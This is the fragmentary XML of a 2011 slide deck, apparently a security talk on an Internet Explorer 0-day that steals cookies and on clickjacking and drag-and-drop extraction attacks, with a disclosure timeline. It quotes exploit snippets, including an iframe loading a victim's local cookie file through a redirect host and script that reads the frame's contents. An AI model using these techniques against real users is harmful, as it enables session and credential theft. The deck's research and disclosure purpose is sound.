            <a:ext cx="4927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=“file:///c:/test.txt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ANd9GcRxyDTYXZ_6OChNsdScn2qM41eendCrIoF2uNvV-OiIpbBPgSRp"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1332000" y="279396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ANd9GcSVCoo69EwQD_l6GbXhhLNQETMwjLO6T3gjxqNl6Z_74h_Xspnf"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732720" y="2724120"/>
            <a:ext cx="966600" cy="9669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2411280" y="3116160"/>
            <a:ext cx="4105440" cy="216000"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 58824"/>
              <a:gd name="adj2" fmla="val 148446"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99cc00">
              <a:alpha val="23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659640" y="3619440"/>
            <a:ext cx="1616040" cy="307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urier New"/>
              </a:rPr>
              <a:t>Access den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5410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Do not open that folder…aka IE 0-day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95280" y="83664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"file:///C:/Documents and Settings/tentacoloViola/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Cook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"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect l="0" t="0" r="73960" b="38263"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6062760" y="1557360"/>
            <a:ext cx="308124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Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250920" y="1700280"/>
            <a:ext cx="57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Cookies folder of the user currently log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ll kind of cook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HTTP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Secure (HTTPS) cook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ny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W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Works on IE 6,7, 8 (also protected m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ested on XP SP3, Vista,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634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Of coordinated discosure and other oddities…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January 28th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Disclosed to MSRC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 9 beta still vulnerabl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March 14°: f</a:t>
            </a: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rst official release of IE9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E9 not vulnerable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quare721 BT"/>
              </a:rPr>
              <a:t>Two weeks ago</a:t>
            </a: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New attack vector found, works also on IE9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9640" y="400536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file://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:/Documents and Settings/tentacoloViola/Cookies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9640" y="5157720"/>
            <a:ext cx="8209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&lt;iframe sr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“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</a:rPr>
              <a:t>http://192.168.1.2/redir.pl?url=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:///C:/Documents and Settings/tentacoloViola/Cookies/tentacoloviola@google[1].txt</a:t>
            </a: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”&gt;&lt;/ifr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995640" y="4653000"/>
            <a:ext cx="792360" cy="431640"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 53102"/>
              <a:gd name="adj2" fmla="val 3970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24000" y="443700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224000" y="29973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21718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Find a way to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763560"/>
            <a:ext cx="2376360" cy="6494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  <a:effectLst>
            <a:outerShdw dist="153753" dir="2700000" blurRad="0" rotWithShape="0">
              <a:srgbClr val="00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Load arbitrary cook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into an i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716280"/>
            <a:ext cx="2376360" cy="64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6280"/>
            <a:ext cx="237636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Guess victim’s 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rcRect l="0" t="11991" r="5493" b="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987640" y="836640"/>
            <a:ext cx="576360" cy="536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635280" y="2635200"/>
            <a:ext cx="4465800" cy="459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ourier New"/>
              </a:rPr>
              <a:t>document.getElementById(‘myId’).contentWindow.document.inner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8172360" y="2635200"/>
            <a:ext cx="792360" cy="459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Courier New"/>
              </a:rPr>
              <a:t>Access den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203640" y="4437000"/>
            <a:ext cx="5762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//C:/Documents and Setting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Cookies/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@site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24000" y="155736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2700360" y="0"/>
            <a:ext cx="5986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Where do we go from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3573360"/>
            <a:ext cx="5154480" cy="64944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The path of the cookie folder depends o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name current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916280"/>
            <a:ext cx="5184720" cy="649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Same Origin Policy will block any program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access to a local iframe content from web dom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72080" y="5013360"/>
            <a:ext cx="5184720" cy="1081080"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst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Different OSs store cookies in different path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Windows XP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="it-IT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C:/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Documents and Settings/user/Cooki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Vista and 7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ffff"/>
                </a:solidFill>
                <a:latin typeface="Square721 BT"/>
              </a:rPr>
              <a:t> C:/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Users/user/AppData/Roam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         </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="it-IT" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Square721 BT"/>
              </a:rPr>
              <a:t>Microsoft/Windows/Cookies/L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87640" y="220500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987640" y="3781440"/>
            <a:ext cx="511200" cy="511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2987640" y="5157720"/>
            <a:ext cx="51120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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6443640" y="1410840"/>
            <a:ext cx="0" cy="129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5940360" y="2276640"/>
            <a:ext cx="3203640" cy="1008000"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 89299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6732720" y="2460600"/>
            <a:ext cx="720720" cy="184320"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 77515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quare721 BT"/>
              </a:rPr>
              <a:t>Clickjacking aka UI Redressing attack</a:t>
            </a:r>
            <a:endParaRPr b="1" lang="en-US" sz="20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9139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ntroduced by Jeremiah Grossman and Robert Hansen in 2008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-34308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It’s all about:</a:t>
            </a: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s overlapping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-285840">
              <a:spcBef>
                <a:spcPts val="349"/>
              </a:spcBef>
              <a:buSzPct val="1174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CSS opacity</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Square721 BT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quare721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quare721 BT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692280"/>
            <a:ext cx="896472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6372360" y="2060640"/>
            <a:ext cx="1296720" cy="503280"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 87041"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80008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376400" y="178596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acity=0; z-index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440400" y="292428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city=100; z-index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697800" y="2190600"/>
            <a:ext cx="647640" cy="216000"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartSummingJunction">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="800080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6948360" y="1555920"/>
            <a:ext cx="358920" cy="574560"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14157"/>
              <a:gd name="adj2" fmla="val 1211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0" y="2060640"/>
            <a:ext cx="766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The basic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properly positio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Iframe made invi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User clicks “hijack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User interaction is needed, SOP is not trigg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Square721 BT"/>
              </a:rPr>
              <a:t>Advanced scenario: content extraction (Paul Stone,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quare7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6517800" y="126828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4581360"/>
            <a:ext cx="8913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ocial engineer a vict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elect content from a legitimate 3rd party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Drag&amp;drop content in an attacker controlled e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Steal sensitive HTML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Square721 BT"/>
              </a:rPr>
              <a:t>Links  and Images are converted in U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076720" y="5635800"/>
            <a:ext cx="3816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urier New"/>
              </a:rPr>
              <a:t>event.dataTransfer.getData(“Tex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3:00:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-05-14T22:38:09Z</dcterms:modified>
  <cp:revision>89</cp:revision>
  <dc:subject/>
  <dc:title>Diapositiva 1</dc:title>
</cp:coreProperties>
</file>